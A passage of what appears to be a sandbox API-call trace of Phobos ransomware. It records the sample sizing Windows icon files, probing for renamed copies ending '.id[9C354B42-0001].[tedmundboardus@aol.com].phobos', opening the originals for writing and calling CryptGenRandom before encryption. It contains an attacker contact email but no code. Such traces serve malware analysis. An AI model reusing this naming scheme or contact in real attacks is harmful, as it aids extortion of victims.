(lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico")) returned 0x20 [0205.687] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.687] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.687] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.687] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.688] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=29422) returned 1 [0205.688] CloseHandle (hObject=0xfc) returned 1 [0205.688] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico")) returned 0x20 [0205.688] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.688] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.688] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.688] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.688] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=83560) returned 1 [0205.688] CloseHandle (hObject=0xfc) returned 1 [0205.689] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico")) returned 0x20 [0205.689] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.689] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.689] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=51881) returned 1 [0205.689] CloseHandle (hObject=0xfc) returned 1 [0205.689] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico")) returned 0x20 [0205.689] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.690] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.690] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.690] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=67664) returned 1 [0205.690] CloseHandle (hObject=0xfc) returned 1 [0205.690] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico")) returned 0x20 [0205.690] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.690] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.690] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.690] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.691] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=49227) returned 1 [0205.691] CloseHandle (hObject=0xfc) returned 1 [0205.691] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico")) returned 0x20 [0205.691] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.691] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.691] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.691] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.692] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=113140) returned 1 [0205.692] CloseHandle (hObject=0xfc) returned 1 [0205.693] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico")) returned 0x20 [0205.693] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.694] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.694] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=53411) returned 1 [0205.694] CloseHandle (hObject=0xfc) returned 1 [0205.694] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico")) returned 0x20 [0205.694] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.694] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.695] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=58312) returned 1 [0205.695] CloseHandle (hObject=0xfc) returned 1 [0205.695] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico")) returned 0x20 [0205.695] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.695] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.695] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.695] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.696] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=60344) returned 1 [0205.696] CloseHandle (hObject=0xfc) returned 1 [0205.696] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico")) returned 0x20 [0205.696] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.696] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.696] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.696] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.696] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=57333) returned 1 [0205.696] CloseHandle (hObject=0xfc) returned 1 [0205.697] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico")) returned 0x20 [0205.697] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.697] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.697] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=60533) returned 1 [0205.697] CloseHandle (hObject=0xfc) returned 1 [0205.697] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico")) returned 0x20 [0205.697] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.698] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.698] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=67156) returned 1 [0205.698] CloseHandle (hObject=0xfc) returned 1 [0205.698] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico")) returned 0x20 [0205.698] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.698] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.699] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=63682) returned 1 [0205.699] CloseHandle (hObject=0xfc) returned 1 [0205.699] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico")) returned 0x20 [0205.699] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.699] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 